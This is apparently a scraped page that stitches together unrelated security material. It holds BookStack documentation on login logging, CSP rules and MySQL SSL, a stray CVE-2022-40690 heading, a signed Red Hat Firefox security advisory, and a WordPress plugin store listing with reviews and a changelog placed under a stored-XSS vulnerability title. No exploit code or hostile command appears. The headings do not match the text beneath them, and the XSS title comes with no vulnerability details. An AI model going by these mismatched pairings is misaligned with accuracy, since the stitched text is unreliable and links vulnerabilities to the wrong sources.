An option is available to log failed login events to a log file which is useful to identify users having trouble logging in, track malicious login attempts or to use with tools such as Fail2Ban. This works with login attempts using the default email & password login mechanism or attempts via LDAP login. Failed attempts are **not logged** for “one-click” social or SAML2 options.

To enable this you simply need to define the LOG_FAILED_LOGIN_MESSAGE option in your .env file like so:

    1
    

    LOG_FAILED_LOGIN_MESSAGE="Failed login for %u"
    

The optional “%u” element of the message will be replaced with the username or email provided in the login attempt when the message is logged. By default messages will be logged via the php error_log function which, in most cases, will log to your webserver error log files.

**Untrusted Server Side Requests**

Some features, such as the PDF exporting, have the option to make http calls to external user-defined locations to do things such as load images or styles. This is disabled by default but can be enabled if desired. This is required for using WKHTMLtoPDF as your PDF export renderer. This should only be enabled in BookStack environments where BookStack users and viewers are fully trusted.

To enable untrusted server side requests, you need to define the ALLOW_UNTRUSTED_SERVER_FETCHING option in your .env file like so:

    1
    

    ALLOW_UNTRUSTED_SERVER_FETCHING=true
    

**Content Security Policy (CSP)**

BookStack serves responses with a CSP header to increase protection again malicious content. This is especially important in a system such as BookStack where users can create a variety of HTML content, especially so if you allow untrusted users to create content in your instance. The CSP rules set by BookStack are as follows:

*   frame-ancestors 'self'
    *   Restricts what websites can embed BookStack pages via iframes.
    *   See the “Host Iframe Control” section above for details on expanding this rule to other hosts.
*   frame-source 'self' https://*.diagrams.net https://*.draw.io https://*.youtube.com https://*.youtube-nocookie.com https://*.vimeo.com https://embed.diagrams.net
    *   Restricts what sources are allowed to load for frames/iframes.
    *   Can be configured via a ALLOWED_IFRAME_SOURCES .env option.
    *   May be different depending on other configuration set.
*   script-src http: https: 'nonce-abc123' 'strict-dynamic'
    *   Restricts what scripts can be ran on a BookStack-served page.
    *   Will not be set if the ALLOW_CONTENT_SCRIPTS .env option is active.
    *   The nonce value used is randomly generated upon each request. It is automatically applied to any “Custom HTML Head Content” scripts.
*   object-src 'self'
    *   Restricts which embeddable content can be loaded onto a BookStack-served page.
    *   Will not be set if the ALLOW_CONTENT_SCRIPTS .env option is active.
*   base-uri 'self'
    *   Restricts what <base> tags can be added to a BookStack-served page.

If needed you should be able to set additional CSP headers via your webserver. If there’s a clash with an existing BookStack CSP header then browsers will generally favour the most restrictive policy.

**MySQL SSL Connection**

If your BookStack database is not on the same host as your web server, you may want to ensure the connection is encrypted using SSL between these systems. Assuming SSL is configured correctly on your MySQL server, you can enable this by defining the MYSQL_ATTR_SSL_CA option in your .env file like so:

    1
    2
    3
    4
    5
    

    # Path to Certificate Authority (CA) certificate file for your MySQL instance.
    # When this option is used host name identity verification will be performed
    # which checks the hostname, used by the client, against names within the
    # certificate itself (Common Name or Subject Alternative Name).
    MYSQL_ATTR_SSL_CA="/path/to/ca.pem"
    

**Using BookStack Content Externally**

In some scenarios you may use BookStack user-provided content externally (Accessed via the database or API). Such content is not guaranteed to be safe so keep security in mind when dealing with such content. In some cases, the system will apply some filtering to content in an attempt to prevent certain vulnerabilities, but this is not assured to be a bullet-proof defence.

Within its own interfaces, unless disabled, BookStack makes use of Content Security Policy (CSP) rules to heavily negate cross-site scripting vulnerabilities from user content. If displaying user content externally, it’s advised you also use defences such as CSP or other techniques such as disabling of JavaScript entirely.

CVE-2022-40690: Security ·  BookStack

Red Hat Security Advisory 2022-7071-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.4.0 ESR. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:7071-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7071  
Issue date:        2022-10-20  
CVE Names:         CVE-2022-42927 CVE-2022-42928 CVE-2022-42929  
                   CVE-2022-42932  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.4.0 ESR.

Security Fix(es):

* Mozilla: Same-origin policy violation could have leaked cross-origin URLs  
(CVE-2022-42927)

* Mozilla: Memory Corruption in JS Engine (CVE-2022-42928)

* Mozilla: Denial of Service via window.print (CVE-2022-42929)

* Mozilla: Memory safety bugs fixed in Firefox 106 and Firefox ESR 102.4  
(CVE-2022-42932)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2136156 - CVE-2022-42927 Mozilla: Same-origin policy violation could have leaked cross-origin URLs  
2136157 - CVE-2022-42928 Mozilla: Memory Corruption in JS Engine  
2136158 - CVE-2022-42929 Mozilla: Denial of Service via window.print  
2136159 - CVE-2022-42932 Mozilla: Memory safety bugs fixed in Firefox 106 and Firefox ESR 102.4

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.4.0-1.el9_0.src.rpm

aarch64:  
firefox-102.4.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.4.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.4.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.4.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.4.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.4.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.4.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.4.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.4.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.4.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.4.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.4.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42927  
https://access.redhat.com/security/cve/CVE-2022-42928  
https://access.redhat.com/security/cve/CVE-2022-42929  
https://access.redhat.com/security/cve/CVE-2022-42932  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1G2AdzjgjWX9erEAQihqA/9HQjFQvkMDXh/mKcrvWv6IA+4YTctJjba  
bYwsaRqtdldbOOtiCxzK99u7bRnlJ9eC+gUPULk9gYcfk/JdzC9inzo+7HiLxv1y  
FB5UzuMtLdrKMLMe8hAbgkA6/0/zXBLx/8ZAY7gMiKZ8m59QOeXLst84+Q/uXg2O  
fw3fEBY8w7PbIKamhNJR0FvgjslA12YhlYuY05SckSxf52klA041wMrXQVwMTrd6  
2yYXITXL14xzo3wuee3ebAmEgz1BztGStdyxAEm6m5sAxXiCxLucXVabTDUCP2dZ  
r9eQoh35s17pbcRtajGRv4wUcMUKvspwf0FKm6CKT2ysCI9DbQ1/4OLAErf5m1b2  
4TD51Z9Ctnjfd53NImtRh0uePMxHh7YgWXRdLCo3K0W9AvUI5j6cccTFyGCxUNsG  
pRBNkvQgQ/LaSb3343z1MmVTtLKEt8JwrZUt8nFPloCc3/F/+iySlMiXK7WFA4L3  
4uUOdBKHzJFCpTIj2W+K1W2gd9nvmSu64Ph9F/WvEUjMzU+8oyXNP0gRvONJEl8i  
NytBnh37ZTx2dYmul3HFGZa2ykHGpTbUz2Nejbj9pHpe0gXTBM2PGfXjV93p6H0+  
NnP1mDOCYL7G0WmEjGLKm6mHNbPK5tMXDU5arAysgvLg07A7uW6v5BN+LRfwCp2D  
HaPTBUgQExg=Y5iw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7071-01

Auth. Stored Cross-Site Scripting (XSS) in Pop-Up Chop Chop plugin <= 2.1.7 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**OVERVIEW**

Pop-Up Chop Chop plugin brings unlimited pop-ups with easily customizable professional templates. Each template comes in **two sizes** (big and small). The pop-ups are **fully responsive** and work with any WordPress theme.

With Pop-Up Chop Chop 2.0 you can create **any number** of input fields and collect your visitors’ emails, names, phone numbers…

Pop-Up Chop Chop is a perfect solution to capture the audience’s attention in the right time and place to build your mailing list.

**CUSTOMIZATION**

Pop-Up Chop Chop allows you to build elegant and professional pop-ups in a couple of minutes. Create attractive content and the pop-ups matching your website’s design. Preview your changes live while editing the content in our custom visual editor. Decide when the visitors see your pop-up – set the time and display the pop-up exactly when and where you want to.

**Features:**

*   Unlimited pop-up number
*   Multiple input fields (drag & drop ordering)
*   Neat designs
*   6 elegant and professional pop-up templates
*   Two pop-up sizes (big and small)
*   Responsive pop-up themes
*   Retina-friendly
*   Quick and easy pop-up setup
*   User-friendly interface
*   Smooth and swift admin panel
*   Highly customizable content
*   Email notifications
*   Turn on/off the pop-ups on mobile devices

**Using The WordPress Dashboard**

1.  Navigate to the ‘Add New’ in the plugins dashboard
2.  Search for ‘pop-up’
3.  Click ‘Install Now’
4.  Activate the plugin on the Plugin dashboard
5.  Go to PopUp in the left menu to manage the pop-ups

**Uploading in WordPress Dashboard**

1.  Navigate to the ‘Add New’ in the plugins dashboard
2.  Navigate to the ‘Upload’ area
3.  Select pop-up from your computer
4.  Click ‘Install Now’
5.  Activate the plugin in the Plugin dashboard
6.  Go to PopUp in the left menu to manage the pop-ups

**Using FTP**

1.  Download ‘pop-up’
2.  Extract the ‘pop-up’ directory to your computer
3.  Upload the ‘pop-up’ directory to the ‘/wp-content/plugins/’ directory
4.  Activate the plugin in the Plugin dashboard
5.  Go to PopUp in the left menu to manage the pop-ups

**1\. How do I add custom fields to my pop-up?**

Follow the Custom Fields Manual to learn how to add new fields to your contact form.

**2\. Questions? Comments?**

Contact talk@chop-chop.org if you have any questions or wish to provide feedback.

Possibilité de relier à MailChimp en version Pro. Vraiment très simple à utiliser et paramétrer.

I went thru all free pop-up plugins out there and everyone of them was really bad - hard to configure, not responsive or just ugly. Pop-up CC is easy to setup and looks awesome. Premium version has more options, but free is still very good - you can use all the templates etc. I had and issue tho with plugin not sending notifications about new subscribers so wrote about it to the creators and they responded very fast, helping me fix it. It works as intended now. Thanks!

Great plugin design and functionality. I had some difficulty setting it up - based on a lack of developer knowledge, but their support team were fantastic and responded to my query within hours. They went above ad beyond to get me set up and now I'm on my way there's no looking back. Can't recommend highly enough - keep up the great work.

Good and quite simple to use. Poor documentation, you have to try to understand some option.

Read all 16 reviews

“Pop-Up Chop Chop” is open source software. The following people have contributed to this plugin.

Contributors

*    Chop Chop

**2.1.7**

WordPress 5.5.1 and PHP 7.4 compatibility  
FIX: Minor php and css errors

**2.1.6**

WordPress 5.4.2 compatibility  
FIX: Input error message

**2.1.5**

WordPress 5.4.1 compatibility  
PHP 7.4 compatibility

**2.1.3**

FIX: Admin responsive css  
UPDATE: Tested with 4.9.2

**2.0.9**

Change load time

**2.0.8**

Cleanup

**2.0.6**

ADD: close on overlay click

**2.0.5**

ADD: style select to wysywig editor

**2.0.4**

Delete: old live preview fields

**2.0.3**

ADD: missing files in wordpress repo

**2.0.2**

ADD: missing files in wordpress repo

**2.0.1**

UPDATE: add newsletter metabox file

**1.4.1**

FIX: wordpress help tabs

**1.4.0**

ADD: CMB upgrade

**1.3.5**

FIX: “disable on” list

**1.3.4**

FIX: Templates css

**1.3.3**

ADD: woocommerce products to “disable on” list

**1.3.2**

FIX: background image uploader

**1.3.0**

ADD: woocommerce pages to “disable on” list

**1.2.5**

FIX: Customize button

**1.2.4**

FIX: Templates css

**1.2.3**

FIX: Google fonts

**1.2.2**

ADD: Jquery Cookies new version

**1.2.1**

FIX: Templates css

**1.2.0**

FIX: Templates css

**1.1.6**

FIX: Templates css

**1.1.5**

ADD: Close timeout option  
FIX: Templates css

**1.1.4**

FIX: Templates css  
FIX: Wysiwyg editor

**1.1.3**

ADD: Field label

**1.1.2**

ADD: “Thank you” message edit option

**1.1.1**

ADD: intro/outro fade  
ADD: New thumbnails  
FIX: Newsletter section

**1.1.0**

FIX: Admin ajax  
ADD: Speed optimization

**1.0.9**

FIX: Templates css

**1.0.8**

ADD: Cookie option  
FIX: Templates css  
ADD: Admin panel enhancements

**1.0.7**

FIX: Templates css

**1.0.6**

FIX: Wysiwyg editor

**1.0.5**

ADD: Field label  
FIX: Button css

**1.0.4**

FIX: headers  
FIX: mobile templates

**1.0.3**

FIX: Templates css

**1.0.2**

FIX: Templates css  
ADD: “Show once per session” option  
ADD: Auto close the pop-up after the sign-up

**1.0.1**

Fix: newsletter signup form

**1.0.0**

First release

Tag

#php